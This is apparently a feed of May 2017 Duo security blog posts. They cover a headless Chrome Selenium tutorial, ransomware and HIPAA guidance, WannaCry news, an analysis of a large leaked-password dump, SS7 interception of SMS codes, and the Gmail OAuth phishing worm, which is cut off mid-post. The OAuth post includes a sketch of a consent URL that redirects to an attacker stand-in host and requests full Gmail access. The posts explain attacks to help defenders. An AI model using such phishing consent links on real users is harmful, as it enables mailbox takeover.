The Duo Blog (https://duo.com/)

Driving Headless Chrome with Python
By Olabode Anise, Duo Labs. Tue, 23 May 2017.
https://duo.com/blog/driving-headless-chrome-with-python

Back in April, Google announced that it will be shipping Headless Chrome in Chrome 59. Since the respective flags are already available on Chrome Canary, the Duo Labs team thought it would be fun to test things out and also provide a brief introduction to driving Chrome using Selenium and Python.

Headless Chrome

Browser Automation

Before we dive into any code, let’s talk about what a headless browser is and why it’s useful. In short, headless browsers are web browsers without a graphical user interface (GUI) and are usually controlled programmatically or via a command-line interface.

One of the many use cases for headless browsers is automating usability testing or testing browser interactions. If you’re trying to check how a page may render in a different browser or confirm that page elements are present after a user initiates a certain workflow, using a headless browser can provide a lot of assistance. In addition to this, traditional web-oriented tasks like web scraping can be difficult to do if the content is rendered dynamically (say, via JavaScript). Using a headless browser allows easy access to this content because the content is rendered exactly as it would be in a full browser.

Headless Chrome and Python

The Dark Ages

Prior to the release of Headless Chrome, any time that you did any automated driving of Chrome that potentially involved several windows or tabs, you had to worry about the CPU and/or memory usage. Both are associated with having to display the browser with the rendered graphics from the URL that was requested.

When using a headless browser, we don’t have to worry about that. As a result, we can expect lower memory overhead and faster execution for the scripts that we write.

Going Headless


Before we get started, we need to install Chrome Canary and download the latest ChromeDriver (currently 2.29).

Next, let’s make a folder that will contain all of our files:

$ mkdir going_headless

Now we can move the ChromeDriver into the directory that we just made:

$ mv Downloads/chromedriver going_headless/

Since we are using Selenium with Python, it’s a good idea to make a Python virtual environment. I use virtualenv, so if you use another virtual environment manager, the commands may be different.

$ cd going_headless && virtualenv -p python3 env  
$ source env/bin/activate

The next thing we need to do is install Selenium. If you’re not familiar with Selenium, it’s a suite of tools that allows developers to programmatically drive web browsers. It has language bindings for Java, C#, Ruby, JavaScript (Node), and Python. To install the Selenium package for Python, we can run the following:

$ pip install selenium


Now that we’ve gotten all of that out of the way, let’s get to the fun part. Our goal is to write a script that searches for my name “Olabode” on duo.com, and checks that a recent article I wrote about Android security is listed in the results. If you’ve followed the instructions above, you can use the headless version of Chrome Canary with Selenium like so:

import os
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.chrome.options import Options

chrome_options = Options()
chrome_options.add_argument("--headless")
chrome_options.binary_location = '/Applications/Google Chrome Canary.app/Contents/MacOS/Google Chrome Canary'

driver = webdriver.Chrome(executable_path=os.path.abspath("chromedriver"), chrome_options=chrome_options)
driver.get("https://duo.com")

magnifying_glass = driver.find_element_by_id("js-open-icon")
if magnifying_glass.is_displayed():
    magnifying_glass.click()
else:
    menu_button = driver.find_element_by_css_selector(".menu-trigger.local")
    menu_button.click()

search_field = driver.find_element_by_id("site-search")
search_field.clear()
search_field.send_keys("Olabode")
search_field.send_keys(Keys.RETURN)

assert "Looking Back at Android Security in 2016" in driver.page_source
driver.close()

Example Explained

Let’s break down what’s going on in the script. We start by importing the requisite modules. The Keys class provides keys on the keyboard, such as RETURN, F1 and ALT.

import os  
from selenium import webdriver  
from selenium.webdriver.chrome.options import Options  
from selenium.webdriver.common.keys import Keys

Next, we create a ChromeOptions object which will allow us to set the location of the Chrome binary that we would like to use and also pass the headless argument. If you leave out the headless argument, you will see the browser window pop up and search for my name.

In addition, if you don’t set the binary location to the location of Chrome Canary on your system, the current version of Google Chrome that is installed will be used. I wrote this tutorial on a Mac, but you can find the location of the file on other platforms here. You just need to substitute Chrome for Chrome Canary in the respective file paths.

chrome_options = Options()
chrome_options.add_argument("--headless")
chrome_options.binary_location = '/Applications/Google Chrome Canary.app/Contents/MacOS/Google Chrome Canary'
driver = webdriver.Chrome(executable_path=os.path.abspath("chromedriver"), chrome_options=chrome_options)
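The Canary binary lives in a different place on each platform. As a minimal sketch of picking the right path per OS (these paths are typical default install locations and are assumptions; verify them on your own machine):

```python
import platform

# Assumed default install locations for Chrome Canary; verify on your system.
# There is no Canary channel on Linux, so it is omitted here.
CANARY_PATHS = {
    "Darwin": "/Applications/Google Chrome Canary.app/Contents/MacOS/Google Chrome Canary",
    "Windows": r"C:\Users\you\AppData\Local\Google\Chrome SxS\Application\chrome.exe",
}

def canary_binary():
    """Return the assumed Canary path for this OS, or None if unknown."""
    return CANARY_PATHS.get(platform.system())

print(canary_binary())
```

The returned string can then be assigned to chrome_options.binary_location in place of the hard-coded Mac path.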

The driver.get function will be used to navigate to the specified URL.

driver.get("https://duo.com")


The duo.com website is responsive, so we have to handle different conditions. As a result, we check to see if the expected search icon is displayed and click it; if it isn’t, we click the menu button to get to the search field.

magnifying_glass = driver.find_element_by_id("js-open-icon")
if magnifying_glass.is_displayed():
    magnifying_glass.click()
else:
    menu_button = driver.find_element_by_css_selector(".menu-trigger.local")
    menu_button.click()

Now we clear the search field, search for my name, and send the RETURN key to the driver.

search_field = driver.find_element_by_id("site-search")
search_field.clear()
search_field.send_keys("Olabode")
search_field.send_keys(Keys.RETURN)

We check to make sure that the blog post title from one of my most recent posts is in the page’s source.

assert "Looking Back at Android Security in 2016" in driver.page_source

And finally, we close the browser.

driver.close()

Head to Headless

So, it’s cool that we can now control Chrome using Selenium and Python without having to see a browser window, but we are more interested in the performance benefits we talked about earlier. Using the same script above, we profiled the time it took to complete the tasks, peak memory usage, and CPU percentage. We polled CPU and memory usage with psutil and measured the time for task completion using timeit.
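As a rough, self-contained illustration of the timing side of that measurement, here is a sketch using timeit as in our tests; the Selenium workflow is replaced by a stand-in run_task() so the snippet runs anywhere, and the psutil polling of CPU and memory is omitted:

```python
import timeit
from statistics import median

def run_task():
    # stand-in for the headless search workflow above
    sum(range(10000))

def median_seconds(task, runs=10):
    """Time `task` `runs` times and return the median wall-clock seconds."""
    return median(timeit.timeit(task, number=1) for _ in range(runs))

print(median_seconds(run_task))
```

Taking the median over several runs, rather than a single measurement, smooths out one-off slowdowns from other processes on the machine.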

                         Headless (60.0.3102.0)   Headed (60.0.3102.0)
Median Time              5.29 seconds             5.51 seconds
Median Memory Use        25.3 MiB                 25.47 MiB
Average CPU Percentage   1.92%                    2.02%

For our small script, there were very small differences in the amount of time taken to complete the task (4.3%), memory usage (0.5%), and CPU percentage (5.2%). While the gains in our example were very minimal, these gains would prove to be beneficial in a test suite with dozens of tests.

Manual vs. Ad Hoc

In the script above, we start the ChromeDriver server process when we create the WebDriver object and it is terminated when we call quit(). For a one-off script, that isn’t a problem, but this can waste a nontrivial amount of time for a large test suite that creates a ChromeDriver instance for each test. Luckily, we can manually start and stop the server ourselves, and it only requires a few changes to the script above.

Example Snippet

import os
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.chrome.options import Options

service = webdriver.chrome.service.Service(os.path.abspath("chromedriver"))
service.start()

chrome_options = Options()
chrome_options.add_argument("--headless")

# path to the binary of Chrome Canary that we installed earlier
chrome_options.binary_location = '/Applications/Google Chrome Canary.app/Contents/MacOS/Google Chrome Canary'

driver = webdriver.Remote(service.service_url, desired_capabilities=chrome_options.to_capabilities())

Snippet Explained

While there are only three lines of code that have changed, let’s talk about what’s going on in them. In order to manually control the ChromeDriver server, we have to use the ChromeDriverService. We do so by creating a service object with a path to the ChromeDriver and then we can start the service.

service = webdriver.chrome.service.Service(os.path.abspath("chromedriver"))
service.start()

The final thing we have to do is create a WebDriver that can connect to a remote server. In order to use Chrome Canary and the headless mode, we have to pass the dictionary of all the options, since the remote WebDriver object doesn’t accept an Options object.

driver = webdriver.Remote(service.service_url, desired_capabilities=chrome_options.to_capabilities())

The Payoff

By manually starting the service, we saw the expected speed increases. The median time for the headless and headed browsers to complete the tasks in the script decreased by 11% (to 4.72 seconds) and 4% (to 5.29 seconds), respectively.

                           Headed Browser   Headless Browser
Median Time (% decrease)   4%               11%
Median Time (seconds)      5.29 seconds     4.72 seconds

The Wrap-Up

The release of headless Chrome has long been awaited. And with the announcement that the creator of PhantomJS is stepping down as a maintainer, we strongly believe that headless Chrome is the future of headless browsers.

While we covered Selenium in this walkthrough, it is worth mentioning that the Chrome DevTools API can be a useful resource if you’re doing any type of profiling or need to create PDFs of pages that you visit. We hope this helps you get started using the headless version of Chrome whether you’re doing any type of QA testing or are automating all your daily web-related tasks.



HHS Urges HIPAA Guidance for Dealing With Ransomware
By Thu Pham, Industry News. Thu, 18 May 2017.
https://duo.com/blog/hhs-urges-hipaa-guidance-for-dealing-with-ransomware

In the wake of the widespread ransomware attack launched last Friday that has quickly spread worldwide, the Dept. of Health and Human Services (HHS) sent an email reminder to healthcare organizations, urging them to adhere to the Office for Civil Rights’ (OCR) ransomware guide published last year.

The guide covers how to prevent and recover from a ransomware attack, as well as how the Health Insurance Portability and Accountability Act (HIPAA) plays a role when it comes to breach notification.

While the ransomware attack hit hospitals in the U.K. hard, Forbes has reported on infected medical devices in a U.S. hospital affecting Bayer Medrad radiology equipment used to improve imaging. Bayer will be sending out a patch for its Windows-based devices soon.

Preventing Ransomware With HIPAA

How do the HIPAA Security Rule requirements address the security measures you can take to prevent malware and ransomware?

While not as specific or technical as PCI DSS, the requirements do provide a broad outline of basic measures to take:

  • Security Management Process - Conduct a risk analysis to identify threats and vulnerabilities to electronic protected health information (ePHI).
  • Security Measures & Procedures - Implement security measures and procedures to mitigate risks, guard against and detect malware.
  • Train Users - Educate employees so they can assist in detecting malware, and know how to report detections.
  • Strong Access Controls - Limit access to ePHI to only the users, applications or programs that require access.

For example, the guide acknowledges that there isn’t a HIPAA requirement that explicitly calls for updating network device firmware, but healthcare organizations should identify and address the risks to ePHI when using network devices running on out-of-date firmware.

To secure remote access to systems with ePHI, using two-factor authentication can reduce the risk of phishing or password-related breaches. It’s highly recommended in HHS’s HIPAA Security Guidance, and required for e-prescriptions by the Drug Enforcement Administration (DEA) - known as Electronic Prescriptions for Controlled Substances (EPCS) compliance.

Recovering from Ransomware With HIPAA

There are specific policies and procedures that can help healthcare organizations when it comes to responding and recovering from ransomware:

  • Implement a Data Backup Plan - Maintain frequent backups and conduct periodic test restorations to verify the integrity of the data backups. Keep backups offline and unavailable to other networks to avoid infection.
  • Establish a Contingency Plan - In addition to a data backup plan, healthcare organizations need to conduct disaster recovery and emergency operations planning. They also need to analyze the criticality of applications and data, while periodically testing contingency plans to make sure their teams are ready to execute. This can help businesses (like hospitals) continue operating while recovering from an attack.
  • Security Incident Procedures - Create procedures to detect and conduct an analysis of ransomware; contain the impact and propagation of the ransomware; and remediate vulnerabilities associated with the ransomware attack.
  • Post-Incident Procedures - Conduct a deeper analysis of the incident to determine if providing a breach notification is necessary, and incorporate lessons learned into existing security processes to improve incident response effectiveness for future incidents.

Remediating vulnerabilities that may have allowed the ransomware to infect your systems is key to closing security gaps quickly and protecting against another malware infection. One example is applying the Microsoft emergency patches released for older versions of their Windows operating system (OS) to prevent the spread of the WannaCry ransomware.

In addition to keeping your antivirus up to date, you should keep device OS, browsers, plugins and other software updated to protect against publicly-reported vulnerabilities that can be used to compromise access to your users’ devices and healthcare systems. Use an endpoint security solution that can detect risky devices and block them until users update.

Finally, when it comes to breach notification, the HHS states:

The OCR presumes a breach in the case of ransomware attack. The entity must determine whether such a breach is a reportable breach no later than 60 days after the entity knew or should have known of the breach.

Read more about the recent WannaCry ransomware attack, including specific tips to help you prevent malware infection while keeping risky devices from accessing your applications, and learn more about Duo for Healthcare.

The Competitive Advantage of Integrating Security & Privacy into Your Business Strategy
By Thu Pham, Industry News. Wed, 17 May 2017.
https://duo.com/blog/the-competitive-advantage-of-integrating-security-and-privacy-into-your-business-strategy

Organizations are exploring how to create value and gain a competitive advantage by integrating information security and privacy with their business strategy, according to a 2017 cybersecurity report from PricewaterhouseCoopers (PwC).

Competitive Advantage: Security, Privacy & Usability

The shift in business models from a one-time sales event to a longer product lifecycle that provides add-on digital services over time drives up customers’ expectations around usability, privacy and security.

That makes these priorities for digital services a must-have for any business attempting to stay competitive in a digital industry.

In a 2016 survey of emerging consumer risks over the next five years, the Travelers Risk Index found that 32 percent of Americans are concerned about cyber risk and the Internet of Things (IoT), second to global political and social unrest. Top overall concerns include financial, personal safety, privacy loss and identity theft, mainly related to the threat of bank or financial accounts getting hacked.

Similarly, the same survey found that 54 percent of businesses are concerned with cyber, computer/technology risks and data breaches, among other top concerns about medical cost inflation and increasing employee benefit costs. Another 25 percent feel unprepared to deal with cyber risks.

Business Security Spending Priorities

According to PwC, business spending priorities for the next year include improved collaboration among business, digital and IT (51%), and spending on new security needs related to evolving business models (46%). Another 43% are spending on biometrics and advanced authentication.

Those new security needs include technology like encryption, next-generation firewalls, network segmentation and identity and access management. As Tom Puthiyamadam, Global Digital Services Leader of PwC stated:

Leading companies are integrating cybersecurity, privacy and digital ethics from the outset. And that enables them to better engage with existing customers and attract new ones. Many also see efficiencies in operations, business processes and IT investments.

Multi-Factor Authentication as a Differentiator

The top managed security service used is authentication, at 64 percent, followed by data loss prevention (61 percent) and identity and access management (61 percent).

Respondents reported that advanced authentication (PwC uses this term in reference to multi-factor authentication) technologies have made online transactions more secure, boosted consumer confidence in company security and privacy capabilities, and enhanced the customer experience while protecting brand reputation.

While in the past, many companies implemented multi-factor authentication after a breach, nowadays, most are implementing the technology as a preventative measure to secure access to on-premises, cloud and web applications and services, and as a stronger authentication option for their customers to protect their individual banking, social media, iCloud and many other types of accounts.

Global Data Regulations

In addition to being a competitive advantage, there are data regulatory requirements that vary by each country that are also driving changes in enterprise security.

These include the European Union (EU)’s General Data Protection Regulation (GDPR) going into effect April 2018 that mandates data privacy for EU citizens - noncompliance can result in fines of up to 4 percent of the company’s global annual revenue.

Additionally, many U.S. businesses will need to comply with the Privacy Shield, the successor to the Safe Harbor framework that protects EU citizens’ personal data in transit.

There are regulations across Asia as well - in China, recent laws require technology and financial companies to store data in China, submit to security checks and help the government with decryption if requested. South Korea’s Personal Information Act (PIPA), updated last year, has penalties that can amount to nearly $90,000 USD and/or 10 years in prison.

Hong Kong’s Personal Data Privacy Ordinance also sets rules for collecting and handling personal data across borders and to third parties, enforced by fines of over $100,000 USD and five years in prison. A new framework called the Cyber Fortification Initiative requires banks to meet certain security requirements, with major Hong Kong banks to complete evaluations of their cyber risk resilience by mid-2017.

Find out more about how Duo’s Trusted Access platform provides help for different use cases and view our case studies for companies across every industry, compliance needs and size.

Widespread Ransomware Attack Plagues Europe, Asia & U.K. Hospitals
By Thu Pham, Industry News. Fri, 12 May 2017.
https://duo.com/blog/widespread-ransomware-attack-plagues-europe-asia-and-uk-hospitals

Update 5/15:
The ransomware has spread to 200,000 computers in 150 countries, affecting U.S. FedEx, telecoms and gas companies in Spain, 61 NHS organizations, the Russian Ministry of Internal Affairs and many others, according to the Economist and BBC. A few different variations of the malware have been detected.

What you can do:
Microsoft has taken the “highly unusual step” of providing a security update for Windows XP, Windows 8 and Windows Server 2003, available here.

Windows 10 users are not affected, only older versions of the operating system. Other suggestions include disabling the SMB protocol in Windows computers and updating antivirus solutions.

Take other precautions such as using the Chrome browser, and disable Adobe Flash Player. Forward suspicious/possible phishing emails to your security team and don’t click on any links. Back up your data on a physical hard drive disconnected from the Internet, in addition to a cloud service (but beware, it could get infected), as recommended by PCWorld.

Start tracking devices running out-of-date operating systems, browsers, plugins and more with Duo’s Device Insight and block them with Endpoint Remediation to prevent the access of potentially risky software into your systems.

A widespread, worm-like ransomware attack has shut down computers across Europe and Asia, hitting the Spanish telecom provider, Telefonica and operations in major U.K.-based health systems especially hard. Many other mission-critical organizations have also been disrupted, including banks and power companies.

The attack has taken down at least 16 National Health Service (NHS) hospital systems across England, affecting parts of Scotland, as reported by ZDNet. Hospitals in Manchester, Lister Hospital in Hertfordshire and Bart’s Health NHS Trust in London are all affected.

The hospitals have diverted patients to neighboring hospitals and are urging others not to visit their emergency departments. Routine appointments have been cancelled, with entire systems shut down and some hospitals reporting problems with their telephone networks.

Ransomware Leverages Latest Windows Vulnerability

According to NHS Digital, the organization that runs IT systems for the health service, the malware variant used is Wanna Decryptor.

BleepingComputer reports that the ransomware’s name is actually WCry, but is referenced online by various similar names. There have been several reports that the ransomware is using an NSA exploit leaked by Shadow Brokers last month, a vulnerability in the SMBv1 protocol affecting Windows machines.

It uses a self-replicating payload that allows the ransomware to spread across machines quickly without requiring any user action, according to Ars Technica. Below is a photo of the ransomware encryption message that users are seeing on their computers:

There were reports early Friday on social media of the ransomware spreading quickly through Russia, Ukraine and Taiwan.

Although Microsoft patched the critical vulnerability in March, not all Windows users or administrators have necessarily applied the security update. Unpatched computers are easy targets of exploitation and malware installation.

Back in January, Barts Health NHS hospitals were hit by a ransomware infection which took its systems offline. According to Barts Health NHS Trust, their antivirus software failed to detect the virus. Another attack last November against the Northern Lincolnshire and Goole NHS Foundation Trust infected their systems with a type of ransomware known as Globe2.

Windows XP Run Rampant in U.K. Health Systems

Running extremely out-of-date operating systems (OSs) like Windows XP can be a contributing factor. And as Duo’s data has shown in the past, the healthcare industry has twice as many Windows machines running XP as our average customer.

An analysis of Freedom of Information Act (FoI) requests by Citrix also supports our findings. A survey of 63 NHS trusts (42 responses) in the U.K. revealed that:

90 percent of hospital organizations were running Windows XP on a small percentage of their overall devices.

But even one device running an unsupported (unpatched and unprotected against new vulnerabilities) OS could be the weak link in a hospital system, allowing for malware infection. Windows XP is particularly bad: it was released in 2001 and has not received security updates since April 2014 - meaning a hospital system running the OS could be easily exploited by ransomware that leverages a Windows vulnerability only patched in March.

Protecting Against Ransomware

Updating and patching your software regularly against the latest vulnerabilities is key to protecting your systems against malware infection.

Make sure you have applied Microsoft’s March Update and the MS17-010 update to protect against these types of vulnerabilities that are helping to spread the ransomware to Windows machines worldwide. Check often for emergency patches that are released out of the regular Patch Tuesday cycle for the most critical vulnerabilities.

Learn more by downloading The 2016 Duo Trusted Access Report (our 2017 edition is coming soon!) and The Essential Guide to Securing Remote Access.

A Security Analysis of Over 500 Million Usernames and Passwords
By Kyle Lady, Duo Labs. Thu, 11 May 2017.
https://duo.com/blog/a-security-analysis-of-over-500-million-usernames-and-passwords

We at Duo Labs recently got our hands on the so-called Anti Public Combo List, a dump of 562,077,487 usernames and passwords aggregated from a variety of large-scale data breaches and password dumps. Because the list aggregates many separate breaches, we can’t say anything about user security behavior in particular contexts, but it still provides an uncommonly large view into broad user security choices.

Who Are These Users?

The first question that presents itself when a credential dump lands in your lap is often: who is affected by this breach? We found 8% of the usernames (which are primarily email addresses) appear more than once in the dataset, supporting the idea that this particular dump is, in fact, a collection of individual dumps from separate sources.
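As a hedged sketch of how one might measure that overlap (assuming, as in many combo lists, one "username:password" entry per line; the helper name is ours):

```python
from collections import Counter

def duplicate_fraction(lines):
    """Fraction of distinct usernames that appear more than once."""
    usernames = Counter(line.split(":", 1)[0] for line in lines)
    repeated = sum(1 for count in usernames.values() if count > 1)
    return repeated / len(usernames)

sample = ["a@x.com:pw1", "a@x.com:pw2", "b@y.com:pw"]
print(duplicate_fraction(sample))  # 0.5: one of the two usernames repeats
```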

We also found that 42% of usernames end in yahoo.com, while 7% end in aol.com, leading us to the conclusion that this is a consumer-heavy dataset, rather than, say, corporate email accounts. The domains with more than 1% representation in the user list are below:

Email Domain Percent of Database
yahoo.com 41.71%
aol.com 7.31%
web.de 2.39%
live.com 2.02%
gmx.de 1.91%
msn.com 1.82%
yahoo.de 1.49%
yahoo.fr 1.42%
yahoo.co.uk 1.32%
aim.com 1.15%
comcast.net 1.12%
lycos.de 1.12%
epost.de 1.11%

Overall, 51% of the user accounts are some sort of yahoo.* or ymail.* accounts. Certainly some corporate email accounts are included. By filtering for domains of the Fortune 1000 companies and manually removing domains that are used for consumer email (like yahoo.com and facebook.com), we found that only about 1 million (1.7%) of the accounts in the dump were from domains of large companies, which reinforces our assessment that this is almost entirely (98.3%) consumer accounts.

What Do Their Passwords Look Like?

One measure of password strength is the length of a password. This is a very flawed metric for asserting strength, but you can assert weakness with it: a four-character password is easy to brute force, no matter how many special characters you use.

Distribution of Password Length

The set of passwords in this dump follow a nice exponential long-tail distribution in terms of length, peaking at 9 characters at 27% and falling under 1% after 14 characters. The large spike right after 100 occurs, not coincidentally, at 128 characters, which is the length of a SHA-512 hash in hex.

Upon further inspection, that’s exactly what all of those are: just a bunch of hashes, like fab689475682c7a88be219de0a76f0d6096e487fa0bcdd752048d3aaa76dd9ef47344b89817434a284d8cb5b0111a2ada7aafcb635570c32149e43b58a990c9d.

Since this appears to be a collection of individual password dumps, it’s likely that the breach in question resulted in the theft of hashes instead of cleartext passwords. When this happens, attackers will try to crack as many passwords as possible, leaving the hashes in place for those they couldn’t quickly crack.
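One simple way to separate those leftover hashes from human-chosen passwords is to flag entries that are exactly the hex length of a common digest. A sketch (the regex and helper name are ours, not from our analysis pipeline):

```python
import re

# Digest lengths in hex: MD5 (32), SHA-1 (40), SHA-256 (64), SHA-512 (128).
HEX_DIGEST = re.compile(r"^(?:[0-9a-f]{32}|[0-9a-f]{40}|[0-9a-f]{64}|[0-9a-f]{128})$")

def looks_like_hash(password):
    """True if the entry looks like a raw hex digest rather than a password."""
    return bool(HEX_DIGEST.match(password))

print(looks_like_hash("fab6" * 32))      # True: 128 hex chars (SHA-512 length)
print(looks_like_hash("refrigerator"))
```

This is a heuristic: a user could in principle choose a 32-character hex string as a password, but in a dump of this size such entries are overwhelmingly uncracked hashes.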

The pitfall of just looking at password length is obvious when considering the password “refrigerator.” After all, it’s a 12-character password! That sounds secure! Except that using all lowercase letters dramatically reduces the search space compared to a mix of lowercase, uppercase, numbers and symbols. In this case, it’s an especially bad password, since it’s a single common dictionary word that would likely be on a list of common words an attacker tries before guessing randomly.

One common password restriction is that it must include a number. Whether due to users adopting stronger security habits or merely due to password requirements, 70% of passwords had at least one number. Indeed, the mean number of digits per password is 2.3.
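The search-space point can be made concrete with a quick back-of-the-envelope calculation (95 is the count of printable ASCII characters; the exact alphabet depends on what a given site allows):

```python
# Number of possible 12-character passwords: lowercase-only alphabet
# vs. the full set of 95 printable ASCII characters.
lowercase_only = 26 ** 12
printable_ascii = 95 ** 12

# The mixed-character space is millions of times larger.
print(printable_ascii // lowercase_only)
```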

Uppercase and symbols were not nearly as prevalent, with only 6% and 4% of passwords containing at least one such character, respectively. This lends credence to the argument that it’s merely password requirements that prompt more secure password choices. A surprisingly low result was for the space character, which is allowed by many systems, but was only present in 0.03% of passwords examined.

This suggests that an attacker might be less likely to include the space in their set of search characters, and users would be wise to remember that spaces are often valid password characters. One easy way to incorporate spaces is to use a passphrase: an entire phrase used as a password, assuming you don’t get stopped by draconian maximum lengths.

The Top 10 Passwords

The top ten passwords contain some fan favorites and align closely with other password reports, such as password manager Keeper’s top 10:

Anti Public Keeper
123456 123456
123456789 123456789
abc123 qwerty
password 12345678
password1 111111
12345678 1234567890
111111 1234567
1234567 password
12345 123123
1234567890 987654321
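A hedged sketch of the kind of blocklist check a site might perform against a list like this (the set below is the dump’s top ten; the function name is ours):

```python
# Reject passwords that appear on a list of the most common choices.
TOP_TEN = {
    "123456", "123456789", "abc123", "password", "password1",
    "12345678", "111111", "1234567", "12345", "1234567890",
}

def is_too_common(password):
    return password.lower() in TOP_TEN

print(is_too_common("password1"))   # True
print(is_too_common("tr0ub4dor&3"))
```

Real deployments typically check against much larger lists (millions of entries) loaded from breach corpora rather than a hard-coded set.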

If one had to wager a guess, it looks like 6 characters is the most common minimum password length in modern consumer web applications. That really isn’t enough to reasonably protect your password from someone just trying all the possible passwords (i.e., “brute forcing”). NIST recently wrapped up a comment period on new security standards, which include, “Memorized secrets [i.e., passwords or PINs] [shall] be at least 8 characters in length if chosen by the [user].” These days, something more like 12 characters should be what you aim for as a minimum, since attackers can guess faster as computers get faster.

Ok, So Have I Been Pwned?

Funny you should ask that, as that’s the name of an excellent website that collects breached account data so you can see when and how your username/passwords have been leaked (since, by now, almost everybody’s username/password has been leaked at some point). If you are interested in the source for this particular password dump, Troy Hunt, the creator of HIBP, has posted an analysis of the password dump on his blog.

We recommend that you sign up for the free monitoring option, where you get an email if/when your email address shows up in a newly discovered credential dump. If you are a domain administrator, you can also search for all pwned accounts on your domain.

<![CDATA[SMS-Based Two Factor Exploited in Bank Account Transfer Scheme]]> thu@duosecurity.com(Thu Pham) https://duo.com/blog/sms-based-two-factor-exploited-in-bank-account-transfer-scheme https://duo.com/blog/sms-based-two-factor-exploited-in-bank-account-transfer-scheme Industry News Tue, 09 May 2017 09:45:00 -0400

Yet another example of how SMS-based two-factor authentication is not secure can be seen in the recent Signalling System No. 7 (SS7) attacks in January. Malicious hackers redirected money from German customers’ banking accounts to their own accounts in a series of attacks, according to Ars Technica and Süddeutsche Zeitung.

First, they compromised bank accounts with Trojans that infected users’ devices and stole their account passwords, which let the attackers see customers’ account balances. Second, they intercepted the one-time passwords sent as text messages to users’ phones, which were required to authorize money transfers.

Exploiting SS7

To do that, they exploited a flaw in SS7, the telephony signaling protocol that allows people to send text messages across the world, take uninterrupted phone calls on trains, and roam from one network to another internationally. The protocol is used by more than 800 telecommunications companies globally - making it a key target for criminals looking to remotely intercept one-time passwords and enable money transfers.

The exploited vulnerability in telecommunications networks has been publicly known for many years. The attack was carried out from a foreign mobile network operator in mid-January; that network has since been blocked and affected customers notified. Last week, Rep. Ted Lieu of California called on the Federal Communications Commission (FCC) and the telecom industry to fix this flaw, which was said to be discovered in 2006 and fully disclosed in March, as reported by SC Magazine.

According to an article by Security Intelligence, this ‘flaw’ is really an intentional design feature of SS7 - telephone networks were simply not designed to be secure, and SS7 is what gives users a seamless experience as they travel. One way to keep phone calls private is to use end-to-end encryption apps. Another recommendation is to use more secure methods of two-factor authentication to better protect access to your accounts.

NIST Nixes SMS-Based 2FA

Last July, the U.S. National Institute for Standards and Technology (NIST) announced they were pulling SMS-based two-factor authentication (2FA) from their Digital Identity Guidelines, Special Publication 800-63-3, a move that Duo supported.

NIST states that SMS 2FA isn’t secure because the user may not always be in possession of the phone tied to the phone number, and because SMS messages can be intercepted rather than delivered to the phone. The SS7 attack is one example of why text-based 2FA isn’t the most secure method.

The latest Verizon Data Breach Investigations Report (DBIR) noted this very attack scenario as a ‘common event chain’ listed by NIST as a reason to move away from SMS 2FA. The Verizon DBIR stated:

We are not suggesting using two-factor authentication via SMS is akin to building a house of sticks (as opposed to a straw house) for the mitigation of wolf attacks, but it is a window into the thinking of the adversary. When faced with defeating multi-factor authentication, they will pragmatically try to devise a way to capture both factors for reuse.

Better Ways to 2FA

What are some better, more secure 2FA methods? Try U2F (Universal 2nd Factor), an open authentication standard developed by the FIDO (Fast Identity Online) Alliance for secure and easy-to-use 2FA.

How does it work? Simply enroll with Duo, then tap a physical USB device to verify your identity. This device, known as a U2F authenticator, protects its private keys with a tamper-proof component known as a secure element.

Two-Factor Authentication Evaluation Guide

Or use Duo Push, a push notification delivered to your phone via our 2FA mobile app, Duo Mobile. Approve the notification to verify your identity, and you’ll be granted access after completing your primary method of authentication (typically a username and password).

Learn more about evaluating different two-factor authentication solutions by downloading the Two-Factor Authentication Evaluation Guide.

This guide walks through some of the key areas of differentiation between two-factor authentication solutions and provides some concrete criteria for evaluating technologies and vendors.

<![CDATA[Gmail OAuth Phishing Goes Viral]]> jwright@duo.com(Jordan Wright) https://duo.com/blog/gmail-oauth-phishing-goes-viral https://duo.com/blog/gmail-oauth-phishing-goes-viral Duo Labs Thu, 04 May 2017 09:45:00 -0400

On Wednesday, a Gmail phishing attack leveraging OAuth spread quickly to multiple users. A number of factors made this attack incredibly successful; those factors, along with ways to protect yourself or your employees, are detailed below.

Google Doc Phishing

What Made This Attack Different?

This attack started with a phishing email that originated from someone the recipient likely knew. The email purported to be a request to share a document via Google Docs.

Email Phish

Normally, phishing attacks will then present a fake login page that attempts to trick users into submitting their username and password. These credentials are then sent to the attacker and used to gain access to the email account.

This attack was different in that once the user clicks the “Open in Docs” button, they are taken to a page which requests OAuth permissions for their account, allowing the attacker to hijack the Gmail account to send email on the user’s behalf without needing their credentials. Before going into details, it’s worth a quick background on why OAuth can make for effective phishing campaigns.

OAuth Can Be Convincing

OAuth allows third-party applications to access a service on your behalf without needing your credentials. Instead, the application will request certain permissions depending on what parts of the service it needs to access. This is a legitimate way to safely give applications limited access to a service as your account without giving up your credentials.
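To make the permissions request concrete, here is a sketch of roughly what a Google OAuth consent URL looks like. The client ID and redirect URI are hypothetical placeholders; the scopes shown (full Gmail and contacts access, following Google's published scope scheme) are the kind of access such an application can request:

```python
from urllib.parse import urlencode

# Hypothetical client values -- a real application registers these with Google.
params = {
    "client_id": "EXAMPLE_CLIENT_ID.apps.googleusercontent.com",
    "redirect_uri": "https://attacker.example/callback",
    "response_type": "code",
    # The permissions the app asks for: full Gmail and contacts access.
    "scope": "https://mail.google.com/ https://www.google.com/m8/feeds/",
}

consent_url = "https://accounts.google.com/o/oauth2/v2/auth?" + urlencode(params)
print(consent_url)
```

The consent page the user sees is generated from these parameters; nothing about the URL requires the requesting application to actually be operated by Google.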

This attack used OAuth to gain access to manage contacts and email for the user’s Google account. This allowed it to harvest new recipients, send the emails as the victim to those recipients, and then delete the emails from the user’s Sent Mail.

Google Doc Phishing

There are multiple elements to this campaign that made it highly effective:

  • The email was sent to a user’s contacts, which means recipients saw the email coming from someone they likely know
  • The email looks like a legitimate Google Docs request to share a document
  • The malicious third-party application was named “Google Docs,” matching the email pretext and appearing legitimate to many users (it’s unclear if Google will prevent applications from being named like this in the future)
  • Using OAuth meant that the user was never prompted to enter their credentials, only to allow access to an application. Since the user is typically already logged into their Google account, neither a strong password nor two-factor authentication (2FA) would have stopped the attack.

Worm-Like Behavior

This attack went viral in minutes due to its convincing nature and the way it spread to other recipients. For each new victim, the attack spread to all of their contacts which could lead to exponential growth similar to that of other computer worms, such as the “ILOVEYOU” worm.

Since this is a malicious third-party application gaining access to an account via OAuth, the application could use Google’s APIs to automate a majority of the attack, spreading the attack even more easily and quickly.

This Isn’t Just Email

